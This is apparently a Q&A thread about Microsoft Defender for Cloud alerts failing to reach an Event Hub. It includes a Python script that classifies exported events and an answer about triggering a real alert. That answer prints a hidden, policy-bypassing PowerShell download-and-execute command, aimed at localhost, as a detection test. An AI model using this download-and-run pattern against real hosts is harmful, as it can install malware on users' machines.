Tags: azure, azure-security, azure-defender, azure-security-center

Defender for Cloud - continuous export to Event Hub uneventful


Has anyone been able to successfully send Defender for Cloud events to an Event Hub? https://learn.microsoft.com/en-us/azure/defender-for-cloud/continuous-export#set-up-continuous-export-in-the-azure-portal-1

I've configured this days ago, but I have yet to receive a single event (I am monitoring my Event Hub ingress). I ticked all boxes for events to receive, in a streaming fashion ("Streaming updates" tickbox). It is my test tenant, and I am Owner on everything; everything saves and configures just fine, and I cannot find any errors.

I didn't tick "Export as a trusted service" because I don't need that extra security measure; my Event Hub isn't behind a firewall.

To generate security alerts (one of the events that should be exported) I made use of the sample alert functionality: https://learn.microsoft.com/en-us/azure/defender-for-cloud/alert-validation#generate-sample-security-alerts - I generated those after I configured the continuous export to Event Hub.

I also created a Function App with TLS 1.0, after setting up the export. This should yield a recommendation which also should be exported. I am aware that, for recommendations, it can take day(s) to receive events, as stated here: https://learn.microsoft.com/en-us/azure/defender-for-cloud/faq-general#why-are-recommendations-sent-at-different-intervals-. But it should not be the case for security alerts.
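The question boils down to "is anything real arriving on the Event Hub since export was enabled?". Below is an added consumer-side check, not code from the question or from Microsoft, that triages a batch of Event Hub event bodies. It assumes each event body is one JSON object in the documented Defender for Cloud alert schema (AlertType, Severity, TimeGeneratedUtc, SystemAlertId, AlertDisplayName), assumes portal-generated sample alerts can be told apart by a "[SAMPLE ALERT]" display-name prefix, and uses constructed event bodies in place of messages read from a real hub.

```python
"""Consumer-side sanity check for Defender for Cloud continuous export.

Added example (not from the question or from Microsoft). Assumptions:
  1. each Event Hub event body is one JSON object in the documented
     Defender for Cloud alert schema (AlertType, Severity, TimeGeneratedUtc,
     SystemAlertId, AlertDisplayName);
  2. portal-generated sample alerts carry a "[SAMPLE ALERT]" display-name
     prefix (assumption);
  3. the event bodies at the bottom are constructed, not captured.
"""
import json
from datetime import datetime, timezone

SAMPLE_PREFIX = "[SAMPLE ALERT]"  # assumption, see module docstring
ALERT_REQUIRED = ("AlertType", "Severity", "TimeGeneratedUtc", "SystemAlertId")


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 timestamp; the export uses a trailing 'Z' for UTC."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)


def classify_event(body: str):
    """Return (kind, parsed) with kind in {'alert', 'sample_alert', 'other', 'malformed'}.

    'other' covers exported objects that are not alerts (for example recommendation
    or secure-score records); this check does not try to interpret their shape.
    """
    try:
        obj = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return "malformed", None
    if not isinstance(obj, dict):
        return "malformed", None
    if all(key in obj for key in ALERT_REQUIRED):
        name = str(obj.get("AlertDisplayName") or obj.get("AlertName") or "")
        return ("sample_alert" if name.startswith(SAMPLE_PREFIX) else "alert"), obj
    return "other", obj


def summarize(bodies, export_enabled_at: datetime) -> dict:
    """Count events by kind and list real alerts generated after export was enabled.

    Only a real (non-sample) alert stamped after export_enabled_at demonstrates
    that the alert path into the Event Hub works; older alerts and sample alerts
    are counted but do not count as proof.
    """
    summary = {"alert": 0, "sample_alert": 0, "other": 0, "malformed": 0}
    since_enable = []
    for body in bodies:
        kind, obj = classify_event(body)
        summary[kind] += 1
        if kind == "alert" and parse_utc(obj["TimeGeneratedUtc"]) >= export_enabled_at:
            since_enable.append(obj["SystemAlertId"])
    summary["real_alerts_since_enable"] = since_enable
    summary["export_working"] = bool(since_enable)
    return summary


# Constructed sample event bodies (not captured from a real Event Hub).
EXPORT_ENABLED_AT = datetime(2023, 5, 1, 12, 0, tzinfo=timezone.utc)
CONSTRUCTED_EVENTS = [
    # a portal-generated sample alert, after export was enabled
    json.dumps({"AlertType": "CONSTRUCTED_SAMPLE", "Severity": "High",
                "AlertDisplayName": "[SAMPLE ALERT] Suspicious process executed",
                "TimeGeneratedUtc": "2023-05-01T12:30:00Z",
                "SystemAlertId": "constructed-sample-0001"}),
    # a real alert that predates the export configuration
    json.dumps({"AlertType": "CONSTRUCTED_REAL", "Severity": "Medium",
                "AlertDisplayName": "Suspicious process executed",
                "TimeGeneratedUtc": "2023-04-30T09:00:00Z",
                "SystemAlertId": "constructed-alert-0000"}),
    # a real alert generated after export was enabled: this one proves the pipeline
    json.dumps({"AlertType": "CONSTRUCTED_REAL", "Severity": "High",
                "AlertDisplayName": "Suspicious process executed",
                "TimeGeneratedUtc": "2023-05-02T08:15:00Z",
                "SystemAlertId": "constructed-alert-0001"}),
    # a non-alert record (e.g. a recommendation export); shape not asserted here
    json.dumps({"displayName": "Use TLS 1.2 for the Function App",
                "status": {"code": "Unhealthy"}}),
    # a body that is not JSON at all
    "this is not json",
]

if __name__ == "__main__":
    print(json.dumps(summarize(CONSTRUCTED_EVENTS, EXPORT_ENABLED_AT), indent=2))
```

In practice the `bodies` list is whatever your Event Hub consumer reads (each `EventData` body decoded as UTF-8); an `export_working` of `False` after a real alert has fired on a VM, as the answer below suggests triggering, points at the export configuration rather than at the alert source.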


Solution

  • I was able to reproduce your scenario. From what I can deduce, the sample alerts do not stream into Event Hub. I will look into why this is the case. However, to test this, I recommend that you trigger an actual alert from your machine.

    1. You will need to create a folder on the C: drive named C:\test-MDATP-test\invoice.exe

    2. Launch cmd as administrator and execute the below:

      powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'

    3. The cmd screen will disappear and an alert will be created on MDC and streamed to Event Hub

    Note: If you have MDE you’ll need to ensure that the connection between MDE and MDC is properly set up:

    Ensure Endpoint protection is set to On (not Partial) under MDC – you can find this under Home > Microsoft Defender for Cloud > Environment settings > Your Subscription > Defender Plans > Servers > Settings > Endpoint Protection

    Source: https://learn.microsoft.com/en-gb/azure/defender-for-cloud/alert-validation#simulate-alerts-on-your-azure-vms-windows